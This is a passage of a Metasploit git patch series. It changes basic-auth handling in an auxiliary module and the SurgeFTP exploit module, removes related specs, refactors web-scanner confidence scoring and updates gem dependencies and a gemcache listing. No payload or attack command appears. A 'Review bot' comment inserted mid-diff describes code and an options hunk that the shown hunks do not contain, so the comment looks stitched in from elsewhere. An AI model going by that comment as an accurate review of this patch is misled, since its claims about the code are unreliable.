Msf::Auxiliary 'uri' => app, 'method' => 'GET', 'ctype' => 'text/plain', - 'basic_auth' => 'admin:admin' + 'authorization' => basic_auth('admin','admin') }, 20) if (res and res.code == 200) print_good("#{rhost}:#{rport} Authenticated using admin:admin") diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index b546de063f..cbddcb1930 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb 
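Review bot: `req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])` is now unconditional, while the options hunk just above only removes `BASICAUTH` and registers neither `USERNAME` nor `PASSWORD`; unless the HttpClient mixin registers them (not visible here), both lookups return nil and every probe carries `Authorization: Basic Og==`, which can turn a traversal that works anonymously into a stream of 401s. The old code only set the header when the option was non-empty. Restore that guard, `req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) unless datastore['USERNAME'].to_s.empty?`, and re-register `OptString.new('USERNAME', [false, 'Username for basic auth', ''])` and `OptString.new('PASSWORD', [false, 'Password for basic auth', ''])` in register_options so users can still supply credentials. The description text, which used to name BASICAUTH, should mention the new option names too. The method that builds `req` starts outside the hunk.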
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'uri' => '/cgi/surgeftpmgr.cgi', 'method' => 'POST', - 'basic_auth' => datastore['USERNAME'] + ":" + datastore['PASSWORD'], + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'vars_post' => { 'global_smtp' => "", diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index bb2f642e38..3ddd07d6bd 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -85,26 +85,6 @@ describe Rex::Proto::Http::Client do match.captures[0].chomp.should == base64 end end - - context "and basic_auth" do - before do - cli.set_config({"basic_auth" => "user:pass"}) - end - it "should not have two Authorization headers" do - req = cli.request_cgi - match = req.to_s.match("Authorization: Basic") - match.should be - match.length.should == 1 - end - it "should prefer basic_auth" do - req = cli.request_cgi - match = req.to_s.match(/Authorization: Basic (.*)$/) - match.should be - match.captures.length.should == 1 - match.captures[0].chomp.should == base64 - end - end - end it "should attempt to connect to a server" do From 99a8ec593bb03d4388865aec4c11b51b3ce10a03 Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Fri, 1 Mar 2013 20:21:02 +0200 Subject: [PATCH 126/139] Fixing merge conflicts --- lib/msf/core/auxiliary/web.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 48428b720c..3c83af5f9a 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -179,10 +179,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " FOUND(#{mode.to_s.upcase}) URL(#{location})" 
@@ -211,10 +212,11 @@ module Auxiliary::Web :blame => details[:blame], :category => details[:category], :description => details[:description], - :confidence => details[:category] || opts[:confidence] || 100, :owner => self } + info[:confidence] = calculate_confidence( info ) + report_web_vuln( info ) print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" @@ -278,7 +280,7 @@ module Auxiliary::Web report_web_vuln( info ) print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" + - " PARAMETER(#{element.altered}) VALUES(#{element.params})" + " PARAMETER(#{element.altered}) VALUES(#{element.params})" print_good " PROOF(#{proof})" end From bd8f94c43dac3eb9a81edcce85e47bbe183093f1 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 1 Mar 2013 13:44:52 -0600 Subject: [PATCH 127/139] Update to master tag of 0.5.1 of metasploit_data_models [#44034071] --- Gemfile.lock | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6ac57f60f6..983117cbb4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,6 +1,6 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + revision: 1e3e0c2effb8e1bb6cec9683b830e4244babf706 tag: 0.5.1 specs: metasploit_data_models (0.5.1) @@ -12,22 +12,22 @@ GIT GEM remote: http://rubygems.org/ specs: - activemodel (3.2.11) - activesupport (= 3.2.11) + activemodel (3.2.12) + activesupport (= 3.2.12) builder (~> 3.0.0) - activerecord (3.2.11) - activemodel (= 3.2.11) - activesupport (= 3.2.11) + activerecord (3.2.12) + activemodel (= 3.2.12) + activesupport (= 3.2.12) arel (~> 3.0.2) tzinfo (~> 0.3.29) - activesupport (3.2.11) + activesupport (3.2.12) i18n (~> 0.6) multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) coderay (1.0.9) diff-lcs (1.1.3) - i18n (0.6.1) + i18n (0.6.4) json (1.7.7) method_source (0.8.1) msgpack (0.5.2) From b855bd3f3affb2074b44326d94ab6c4e5edc6374 Mon Sep 17 00:00:00 2001 
From: Luke Imhoff Date: Fri, 1 Mar 2013 14:06:58 -0600 Subject: [PATCH 128/139] Add metasploit_data_models 0.5.1 to gemcache [#44034071] --- .../gems/metasploit_data_models-0.4.0/Gemfile | 10 - .../metasploit_data_models-0.4.0/Rakefile | 7 - .../app/models/mdm/web_vuln.rb | 16 - .../lib/metasploit_data_models/version.rb | 7 - .../.gitignore | 10 +- .../.rspec | 0 .../metasploit_data_models-0.5.1/.simplecov | 38 ++ .../metasploit_data_models-0.5.1/.yardopts | 4 + .../gems/metasploit_data_models-0.5.1/Gemfile | 22 + .../LICENSE | 0 .../README.md | 0 .../metasploit_data_models-0.5.1/Rakefile | 20 + .../app/models/mdm/api_key.rb | 0 .../app/models/mdm/client.rb | 0 .../app/models/mdm/cred.rb | 0 .../app/models/mdm/event.rb | 0 .../app/models/mdm/exploit_attempt.rb | 0 .../app/models/mdm/exploited_host.rb | 0 .../app/models/mdm/host.rb | 0 .../app/models/mdm/host_detail.rb | 0 .../app/models/mdm/host_tag.rb | 0 .../app/models/mdm/imported_cred.rb | 0 .../app/models/mdm/listener.rb | 0 .../app/models/mdm/loot.rb | 0 .../app/models/mdm/macro.rb | 0 .../app/models/mdm/mod_ref.rb | 0 .../app/models/mdm/module_action.rb | 0 .../app/models/mdm/module_arch.rb | 0 .../app/models/mdm/module_author.rb | 0 .../app/models/mdm/module_detail.rb | 0 .../app/models/mdm/module_mixin.rb | 0 .../app/models/mdm/module_platform.rb | 0 .../app/models/mdm/module_ref.rb | 0 .../app/models/mdm/module_target.rb | 0 .../app/models/mdm/nexpose_console.rb | 0 .../app/models/mdm/note.rb | 0 .../app/models/mdm/profile.rb | 0 .../app/models/mdm/ref.rb | 0 .../app/models/mdm/report.rb | 0 .../app/models/mdm/report_template.rb | 0 .../app/models/mdm/route.rb | 0 .../app/models/mdm/service.rb | 0 .../app/models/mdm/session.rb | 0 .../app/models/mdm/session_event.rb | 0 .../app/models/mdm/tag.rb | 0 .../app/models/mdm/task.rb | 0 .../app/models/mdm/user.rb | 0 .../app/models/mdm/vuln.rb | 0 .../app/models/mdm/vuln_attempt.rb | 0 .../app/models/mdm/vuln_detail.rb | 0 .../app/models/mdm/vuln_ref.rb | 0 
.../app/models/mdm/web_form.rb | 0 .../app/models/mdm/web_page.rb | 0 .../app/models/mdm/web_site.rb | 0 .../app/models/mdm/web_vuln.rb | 144 ++++ .../app/models/mdm/wmap_request.rb | 0 .../app/models/mdm/wmap_target.rb | 0 .../app/models/mdm/workspace.rb | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../db/migrate/000_create_tables.rb | 79 +++ .../db/migrate/001_add_wmap_tables.rb | 35 + .../db/migrate/002_add_workspaces.rb | 36 + .../db/migrate/003_move_notes.rb | 20 + .../db/migrate/004_add_events_table.rb | 16 + .../db/migrate/005_expand_info.rb | 58 ++ .../db/migrate/006_add_timestamps.rb | 26 + .../db/migrate/007_add_loots.rb | 20 + .../db/migrate/008_create_users.rb | 16 + .../db/migrate/009_add_loots_ctype.rb | 10 + .../db/migrate/010_add_alert_fields.rb | 16 + .../db/migrate/011_add_reports.rb | 19 + .../db/migrate/012_add_tasks.rb | 24 + .../db/migrate/013_add_tasks_result.rb | 10 + .../db/migrate/014_add_loots_fields.rb | 12 + .../db/migrate/015_rename_user.rb | 16 + .../db/migrate/016_add_host_purpose.rb | 10 + .../db/migrate/017_expand_info2.rb | 58 ++ .../db/migrate/018_add_workspace_user_info.rb | 29 + .../db/migrate/019_add_workspace_desc.rb | 23 + .../db/migrate/020_add_user_preferences.rb | 11 + .../migrate/021_standardize_info_and_data.rb | 18 + .../db/migrate/022_enlarge_event_info.rb | 10 + .../migrate/023_add_report_downloaded_at.rb | 10 + .../024_convert_service_info_to_text.rb | 12 + .../db/migrate/025_add_user_admin.rb | 19 + .../db/migrate/026_add_creds_table.rb | 19 + .../20100819123300_migrate_cred_data.rb | 154 +++++ .../20100824151500_add_exploited_table.rb | 16 + .../20100908001428_add_owner_to_workspaces.rb | 9 + .../20100911122000_add_report_templates.rb | 18 + .../20100916151530_require_admin_flag.rb | 15 + ...00916175000_add_campaigns_and_templates.rb | 61 ++ .../20100920012100_add_generate_exe_column.rb | 8 + .../20100926214000_add_template_prefs.rb | 11 + .../migrate/20101001000000_add_web_tables.rb | 57 ++ 
.../db/migrate/20101002000000_add_query.rb | 10 + .../migrate/20101007000000_add_vuln_info.rb | 15 + ...20101008111800_add_clients_to_campaigns.rb | 10 + ...20101009023300_add_campaign_attachments.rb | 15 + .../20101104135100_add_imported_creds.rb | 17 + .../migrate/20101203000000_fix_web_tables.rb | 34 + .../20101203000001_expand_host_comment.rb | 12 + ...2033_add_limit_to_network_to_workspaces.rb | 9 + ...20110112154300_add_module_uuid_to_tasks.rb | 9 + .../migrate/20110204112800_add_host_tags.rb | 28 + .../20110317144932_add_session_table.rb | 110 +++ ...414180600_add_local_id_to_session_table.rb | 11 + .../20110415175705_add_routes_table.rb | 18 + .../migrate/20110422000000_convert_binary.rb | 72 ++ ...0110425095900_add_last_seen_to_sessions.rb | 8 + ...0110513143900_track_successful_exploits.rb | 31 + ...517160800_rename_and_prune_nessus_vulns.rb | 26 + ...0527000000_add_task_id_to_reports_table.rb | 11 + .../20110527000001_add_api_keys_table.rb | 12 + .../20110606000001_add_macros_table.rb | 16 + ...10622000000_add_settings_to_tasks_table.rb | 12 + .../20110624000001_add_listeners_table.rb | 19 + ...0625000001_add_macro_to_listeners_table.rb | 12 + ...110630000001_add_nexpose_consoles_table.rb | 21 + ...0002_add_name_to_nexpose_consoles_table.rb | 12 + .../20110717000001_add_profiles_table.rb | 15 + ...20110727163801_expand_cred_ptype_column.rb | 9 + .../20110730000001_add_initial_indexes.rb | 85 +++ .../migrate/20110812000001_prune_indexes.rb | 23 + .../db/migrate/20110922000000_expand_notes.rb | 9 + .../20110928101300_add_mod_ref_table.rb | 17 + ...10000_add_display_name_to_reports_table.rb | 24 + .../db/migrate/20111203000000_inet_columns.rb | 13 + .../20111204000000_more_inet_columns.rb | 17 + .../20111210000000_add_scope_to_hosts.rb | 9 + ...0120126110000_add_virtual_host_to_hosts.rb | 9 + ...20120411173220_rename_workspace_members.rb | 9 + ...20601152442_add_counter_caches_to_hosts.rb | 21 + .../20120625000000_add_vuln_details.rb | 34 + 
.../20120625000001_add_host_details.rb | 16 + .../migrate/20120625000002_expand_details.rb | 16 + .../migrate/20120625000003_expand_details2.rb | 24 + .../20120625000004_add_vuln_attempts.rb | 19 + ...000005_add_vuln_and_host_counter_caches.rb | 14 + .../20120625000006_add_module_details.rb | 118 ++++ .../20120625000007_add_exploit_attempts.rb | 26 + .../20120625000008_add_fail_message.rb | 12 + ...2805_add_owner_and_payload_to_web_vulns.rb | 13 + ...ired_columns_to_null_false_in_web_vulns.rb | 35 + .../lib/mdm.rb | 0 .../host/operating_system_normalization.rb | 0 .../lib/metasploit_data_models.rb | 0 .../base64_serializer.rb | 0 .../lib/metasploit_data_models/engine.rb | 0 .../serialized_prefs.rb | 0 .../validators/ip_format_validator.rb | 0 .../password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 8 + .../lib/tasks/yard.rake | 27 + .../metasploit_data_models.gemspec | 4 + .../script/rails | 0 .../spec/app/models/mdm/web_vuln_spec.rb | 87 +++ .../spec/dummy/Rakefile | 0 .../app/assets/javascripts/application.js | 0 .../app/assets/stylesheets/application.css | 0 .../app/controllers/application_controller.rb | 0 .../dummy/app/helpers/application_helper.rb | 0 .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 0 .../spec/dummy/config.ru | 0 .../spec/dummy/config/application.rb | 0 .../spec/dummy/config/boot.rb | 0 .../spec/dummy/config/database.yml.example | 0 .../spec/dummy/config/environment.rb | 0 .../dummy/config/environments/development.rb | 0 .../dummy/config/environments/production.rb | 0 .../spec/dummy/config/environments/test.rb | 0 .../initializers/backtrace_silencers.rb | 0 .../dummy/config/initializers/inflections.rb | 0 .../dummy/config/initializers/mime_types.rb | 0 .../dummy/config/initializers/secret_token.rb | 0 .../config/initializers/session_store.rb | 0 .../config/initializers/wrap_parameters.rb | 0 .../spec/dummy/config/routes.rb | 0 
.../spec/dummy/db/schema.rb | 638 ++++++++++++++++++ .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 0 .../spec/dummy/public/422.html | 0 .../spec/dummy/public/500.html | 0 .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 0 .../spec/lib/base64_serializer_spec.rb | 0 .../spec/spec_helper.rb | 2 + ...c => metasploit_data_models-0.5.1.gemspec} | 16 +- 192 files changed, 3131 insertions(+), 47 deletions(-) delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.gitignore (78%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.rspec (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/README.md (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/client.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_author.rb 
(100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => 
metasploit_data_models-0.5.1}/app/models/mdm/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_site.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/workspace.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => 
metasploit_data_models-0.5.1}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/console_db.yml (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb create mode 100755 